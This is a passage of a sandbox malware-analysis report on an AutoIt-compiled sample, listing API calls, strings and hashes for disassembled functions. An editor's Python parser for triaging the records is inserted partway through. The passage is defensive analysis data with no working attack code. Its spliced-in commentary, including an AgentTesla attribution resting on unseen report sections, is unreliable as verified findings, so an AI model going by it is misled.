                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: LongWindow$MessageSend
                                      • String ID:
                                      • API String ID: 2178440468-0
                                      • Opcode ID: 37c66528cee20729561c974b56ec6b5df2dafaefd23046ccb4b6a34916689f93
                                      • Instruction ID: 4bb15f93cab3e273994e8c2721b80de6361eb52ae4d3ad1c6014c301e52c35dd
                                      • Opcode Fuzzy Hash: 37c66528cee20729561c974b56ec6b5df2dafaefd23046ccb4b6a34916689f93
                                      • Instruction Fuzzy Hash: C7311370758259AFDB20DF18EC94FA937E9EB8A751F144164F9118F2B1CB71ACA0EB00
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008E7769
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008E778F
                                      • SysAllocString.OLEAUT32(00000000), ref: 008E7792
                                      • SysAllocString.OLEAUT32(?), ref: 008E77B0
                                      • SysFreeString.OLEAUT32(?), ref: 008E77B9
                                      • StringFromGUID2.COMBASE(?,?,00000028), ref: 008E77DE
                                      • SysAllocString.OLEAUT32(?), ref: 008E77EC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                      • String ID:
                                      • API String ID: 3761583154-0
                                      • Opcode ID: 952fa06aead5c9ea4086efd4a78c76bc8cba8542cfcc005d151b2cfcf6a3fff4
                                      • Instruction ID: b24441efce7a6fe3a84a44710a848dd008fc4845563d8e1792cead15522bc019
                                      • Opcode Fuzzy Hash: 952fa06aead5c9ea4086efd4a78c76bc8cba8542cfcc005d151b2cfcf6a3fff4
                                      • Instruction Fuzzy Hash: BF217CB6608219AFDB10AFA9CC88CBB77ACFB0A7647048025BA15DB1A1D670DC42C760
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008E7842
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008E7868
                                      • SysAllocString.OLEAUT32(00000000), ref: 008E786B
                                      • SysAllocString.OLEAUT32 ref: 008E788C
                                      • SysFreeString.OLEAUT32 ref: 008E7895
                                      • StringFromGUID2.COMBASE(?,?,00000028), ref: 008E78AF
                                      • SysAllocString.OLEAUT32(?), ref: 008E78BD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                      • String ID:
                                      • API String ID: 3761583154-0
                                      • Opcode ID: 32bff49d3392f82c57495673ca656b8714bb494c6ddfcbf78f57d81b92d882af
                                      • Instruction ID: 063f5fb67be10ba364a43c54d831662989289b0f62ad898a1ee682098dc3d1bb
                                      • Opcode Fuzzy Hash: 32bff49d3392f82c57495673ca656b8714bb494c6ddfcbf78f57d81b92d882af
                                      • Instruction Fuzzy Hash: D1219075608228BFDB10AFA9DC88DAA77ACFB1A3607148135F915CB2A1D670DC41DB68
                                      APIs
                                      • GetStdHandle.KERNEL32(0000000C), ref: 008F04F2
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008F052E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CreateHandlePipe
                                      • String ID: nul
                                      • API String ID: 1424370930-2873401336
                                      • Opcode ID: 601fb003617de282218eede845f8a2123d9e307d1ed72eeae8c826919e9c027a
                                      • Instruction ID: e25831850b68e961ccb136b2f28f79745828494ade4b2ff4002e9ba1c49a07ff
                                      • Opcode Fuzzy Hash: 601fb003617de282218eede845f8a2123d9e307d1ed72eeae8c826919e9c027a
                                      • Instruction Fuzzy Hash: 072153B56043099FDB205F79D844AA977A4FF48724F204A19F9A1E62D1D7B0D940DF20
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 008F05C6
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008F0601
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CreateHandlePipe
                                      • String ID: nul
                                      • API String ID: 1424370930-2873401336
                                      • Opcode ID: 9c691beec3a0d74c2dc52e4c31f954c29d554e190737b2aef6dda97ff33d0bef
                                      • Instruction ID: f40f547876bc8813ee5b628349aa5529d918646e30ce63f553cfb59e387c85a9
                                      • Opcode Fuzzy Hash: 9c691beec3a0d74c2dc52e4c31f954c29d554e190737b2aef6dda97ff33d0bef
                                      • Instruction Fuzzy Hash: C821A6B56043199FDB208F788C04AAA77E4FF95724F204A19FAA1E72D2D7B09860CF10
                                      APIs
                                        • Part of subcall function 0088600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0088604C
                                        • Part of subcall function 0088600E: GetStockObject.GDI32(00000011), ref: 00886060
                                        • Part of subcall function 0088600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0088606A
                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00914112
                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0091411F
                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0091412A
                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00914139
                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00914145
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend$CreateObjectStockWindow
                                      • String ID: Msctls_Progress32
                                      • API String ID: 1025951953-3636473452
                                      • Opcode ID: 841c9dcab74a2db09ec052b44f831b78eaadca63f788445466bf4b29021bc4cf
                                      • Instruction ID: e8ed8613a4e0113c2f669e48e8ce6f5f07694cbf933fec15dba9861eb1faaf68
                                      • Opcode Fuzzy Hash: 841c9dcab74a2db09ec052b44f831b78eaadca63f788445466bf4b29021bc4cf
                                      • Instruction Fuzzy Hash: 4011B2B225021DBEEF119F64CC85EE77F5DEF19798F004110BB18A6050C7729C61DBA4
                                      APIs
                                        • Part of subcall function 008BD7A3: _free.LIBCMT ref: 008BD7CC
                                      • _free.LIBCMT ref: 008BD82D
                                        • Part of subcall function 008B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,008BD7D1,00000000,00000000,00000000,00000000,?,008BD7F8,00000000,00000007,00000000,?,008BDBF5,00000000), ref: 008B29DE
                                        • Part of subcall function 008B29C8: GetLastError.KERNEL32(00000000,?,008BD7D1,00000000,00000000,00000000,00000000,?,008BD7F8,00000000,00000007,00000000,?,008BDBF5,00000000,00000000), ref: 008B29F0
                                      • _free.LIBCMT ref: 008BD838
                                      • _free.LIBCMT ref: 008BD843
                                      • _free.LIBCMT ref: 008BD897
                                      • _free.LIBCMT ref: 008BD8A2
                                      • _free.LIBCMT ref: 008BD8AD
                                      • _free.LIBCMT ref: 008BD8B8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                      • Instruction ID: 6c007c246c8d73fffd159a8248cc638b946bead664e9c2fc0bc10d5b2be50728
                                      • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                      • Instruction Fuzzy Hash: 0E11F671940B04BADA21BFB8CC46FCB7B9CFF04700F404C25B29DE6692EA65A5098666
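Added by the editor, not part of the Joe Sandbox report: a small Python parser for the per-function records in this section (the APIs / Strings / Memory Dump Source / Similarity blocks), with a triage pass that groups each record's imports into behaviour classes and flags the AutoIt3 runtime error format "%s (%d) : ==> %s: %s %s" (the string in the record that follows). That format string corroborates the report's "Binary is likely a compiled AutoIt script file" verdict and marks these disassembled functions as interpreter runtime code (TCP connect, Run with redirected stdio, FileMove, GUI progress bar, fatal-error box) rather than the sample's own logic, which lives in the embedded script and the AgentTesla payload the other signatures describe. The record layout is inferred from the visible report text only and the category table is the editor's own; the sample input is a trimmed copy of three records from this page.

```python
"""Parse the per-function records of a Joe Sandbox report (the APIs / Strings /
Memory Dump Source / Similarity blocks) and triage them.
Editor's added example, not Joe Sandbox code; assumptions are marked inline."""
import re

# Constructed sample: three records copied from this report, trimmed to the
# fields the parser reads.
SAMPLE = """\
APIs
• socket.WS2_32(00000002,00000001,00000006), ref: 00901112
• WSAGetLastError.WS2_32 ref: 00901121
• closesocket.WS2_32(00000000), ref: 009011F9
Memory Dump Source
• Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 008F04F2
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008F052E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 008EDA74
• LoadStringW.USER32(00000000), ref: 008EDA7B
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 008EDADC
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 008EDAB9
Memory Dump Source
• Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
Similarity
• API ID: HandleLoadModuleString$Message
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 4072794657-3128320259
"""

# Record layout inferred from the visible report text (assumption: every
# record opens with an "APIs" line and its bullets look like the ones above).
API_RE = re.compile(r"^•\s+(?:Part of subcall function [0-9A-F]+:\s+)?"
                    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$")
STRING_RE = re.compile(r"^•\s+(?P<text>.*?),\s*xrefs:\s*[0-9A-F ,]+$")
SOURCE_RE = re.compile(r"^•\s+Source File:\s*(?P<dump>\S+\.sdmp),\s*Offset:\s*(?P<off>[0-9A-F]+)")
FIELD_RE = re.compile(r"^•\s+(?P<key>API String ID|API ID|String ID):\s*(?P<val>.*)$")
SECTIONS = {"Strings", "Memory Dump Source", "Similarity", "Joe Sandbox IDA Plugin"}


def parse_records(text):
    """Return one dict per function record: apis [(name, module, ref)], strings,
    dump file name, load offset and the Similarity identifiers."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            rec = {"apis": [], "strings": [], "dump": None, "offset": None}
            records.append(rec)
            section = "APIs"
        elif rec is None or line in SECTIONS:
            section = line
        elif section == "APIs" and (m := API_RE.match(line)):
            rec["apis"].append((m["api"], m["mod"], m["ref"]))
        elif section == "Strings" and (m := STRING_RE.match(line)):
            rec["strings"].append(m["text"])
        elif m := SOURCE_RE.match(line):
            rec["dump"], rec["offset"] = m["dump"], int(m["off"], 16)
        elif m := FIELD_RE.match(line):
            rec[m["key"].lower().replace(" ", "_")] = m["val"]
    return records


# Editor's own, deliberately small mapping of imports to behaviour classes.
CATEGORIES = {
    "network": {"socket", "inet_addr", "closesocket", "WSAGetLastError"},
    "child_process_io": {"CreatePipe", "GetStdHandle"},
    "file_ops": {"MoveFileW", "SHFileOperationW", "WriteFile"},
    "gui": {"MessageBoxW", "SendMessageW", "CreateWindowExW", "LoadStringW"},
}
# Format AutoIt3 uses for its own fatal-error reports
# ("script.au3" (line) : ==> description: line-text ^ ERROR).  Seeing it
# marks a function as interpreter runtime code, not the script's logic.
AUTOIT_ERROR_FMT = "%s (%d) : ==> %s: %s %s"


def triage(rec):
    names = {api for api, _, _ in rec["apis"]}
    return {
        "categories": sorted(c for c, apis in CATEGORIES.items() if names & apis),
        "autoit_runtime_marker": AUTOIT_ERROR_FMT in rec["strings"]
                                 or rec.get("string_id") == AUTOIT_ERROR_FMT,
        "first_ref": min((int(r, 16) for _, _, r in rec["apis"]), default=None),
    }


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        t = triage(rec)
        print(f"{t['first_ref'] or 0:08X} {t['categories']} "
              f"runtime_marker={t['autoit_runtime_marker']} string_id={rec.get('string_id')!r}")
```

Run over a whole report export the same way, the records whose `categories` are empty and whose `string_id` matches a known runtime artefact can be dropped from manual review first; the ones that touch the network, spawn children with redirected stdio or move files are the ones worth opening in the IDA snapshot, with the understanding that in an AutoIt binary they are still library code reached from the script.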
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 008EDA74
                                      • LoadStringW.USER32(00000000), ref: 008EDA7B
                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 008EDA91
                                      • LoadStringW.USER32(00000000), ref: 008EDA98
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 008EDADC
                                      Strings
                                      • %s (%d) : ==> %s: %s %s, xrefs: 008EDAB9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString$Message
                                      • String ID: %s (%d) : ==> %s: %s %s
                                      • API String ID: 4072794657-3128320259
                                      • Opcode ID: f84a8f64ff3d1bb9180d3dc3d3a256ce5ffc166ddaf4b680f1fa6d9d29077eb3
                                      • Instruction ID: 6baeb40282ccb502ccf3e467a3c863b524ec3ebf6f4a49073ff68aff987c065a
                                      • Opcode Fuzzy Hash: f84a8f64ff3d1bb9180d3dc3d3a256ce5ffc166ddaf4b680f1fa6d9d29077eb3
                                      • Instruction Fuzzy Hash: 340186F66443187FEB109BA49D89EEB336CE709345F4044A1F746E2041E6749E848F75
                                      APIs
                                      • InterlockedExchange.KERNEL32(01052F18,01052F18), ref: 008F097B
                                      • RtlEnterCriticalSection.NTDLL(01052EF8), ref: 008F098D
                                      • TerminateThread.KERNEL32(00720065,000001F6), ref: 008F099B
                                      • WaitForSingleObject.KERNEL32(00720065,000003E8), ref: 008F09A9
                                      • CloseHandle.KERNEL32(00720065), ref: 008F09B8
                                      • InterlockedExchange.KERNEL32(01052F18,000001F6), ref: 008F09C8
                                      • RtlLeaveCriticalSection.NTDLL(01052EF8), ref: 008F09CF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                      • String ID:
                                      • API String ID: 3495660284-0
                                      • Opcode ID: 5691f9facb7508a5adc4a5258c370892c4e08793d2f34fce6c0f8a5055716050
                                      • Instruction ID: fcc3bbc47b24ee86e23608808c0bf81167579479699270981385062758115e2c
                                      • Opcode Fuzzy Hash: 5691f9facb7508a5adc4a5258c370892c4e08793d2f34fce6c0f8a5055716050
                                      • Instruction Fuzzy Hash: 23F08171696612BFD7411FA0EE8CBE67B35FF01702F805411F201908A1C7749461DF90
                                      APIs
                                      • __allrem.LIBCMT ref: 008B00BA
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008B00D6
                                      • __allrem.LIBCMT ref: 008B00ED
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008B010B
                                      • __allrem.LIBCMT ref: 008B0122
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008B0140
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                      • String ID:
                                      • API String ID: 1992179935-0
                                      • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                      • Instruction ID: cca79d5ff11f8ad2420fc92208b040744d7a365838252a434c0d48c314671472
                                      • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                      • Instruction Fuzzy Hash: F881C471A00B069FE724AA6CCC41BAB73E9FF46364F24452EF551D7782EBB0D9008B51
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,008A82D9,008A82D9,?,?,?,008B644F,00000001,00000001,8BE85006), ref: 008B6258
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,008B644F,00000001,00000001,8BE85006,?,?,?), ref: 008B62DE
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 008B63D8
                                      • __freea.LIBCMT ref: 008B63E5
                                        • Part of subcall function 008B3820: RtlAllocateHeap.NTDLL(00000000,?,00951444), ref: 008B3852
                                      • __freea.LIBCMT ref: 008B63EE
                                      • __freea.LIBCMT ref: 008B6413
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                      • String ID:
                                      • API String ID: 1414292761-0
                                      • Opcode ID: 289bd6fdb7707fa91f029b00f8b3bd81ed1ee18f036a5f40d145d4feca482d48
                                      • Instruction ID: a64b1e528148eb6509042756410ad134efef6e9d43ad4021761b783978a8274c
                                      • Opcode Fuzzy Hash: 289bd6fdb7707fa91f029b00f8b3bd81ed1ee18f036a5f40d145d4feca482d48
                                      • Instruction Fuzzy Hash: 6B51C172A00216ABEB258F64DC81EEF77A9FB48750F144629FC15D6340EB38DC64D661
                                      APIs
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                        • Part of subcall function 0090C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0090B6AE,?,?), ref: 0090C9B5
                                        • Part of subcall function 0090C998: _wcslen.LIBCMT ref: 0090C9F1
                                        • Part of subcall function 0090C998: _wcslen.LIBCMT ref: 0090CA68
                                        • Part of subcall function 0090C998: _wcslen.LIBCMT ref: 0090CA9E
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0090BCCA
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0090BD25
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0090BD6A
                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0090BD99
                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0090BDF3
                                      • RegCloseKey.ADVAPI32(?), ref: 0090BDFF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                      • String ID:
                                      • API String ID: 1120388591-0
                                      • Opcode ID: 67044df112705e21413e9cb3f1d364436f092acaeb57a8b2d53e8280ab0833bc
                                      • Instruction ID: 07defe4a2c196175e0d35d44dc950959024d7d248e564bd56df2212335de2f7c
                                      • Opcode Fuzzy Hash: 67044df112705e21413e9cb3f1d364436f092acaeb57a8b2d53e8280ab0833bc
                                      • Instruction Fuzzy Hash: A8818F70218241AFD714EF24C895E6ABBE9FF84308F14895CF5958B2A2DB31ED45CB92
                                      APIs
                                      • VariantInit.OLEAUT32(00000035), ref: 008DF7B9
                                      • SysAllocString.OLEAUT32(00000001), ref: 008DF860
                                      • VariantCopy.OLEAUT32(008DFA64,00000000), ref: 008DF889
                                      • VariantClear.OLEAUT32(008DFA64), ref: 008DF8AD
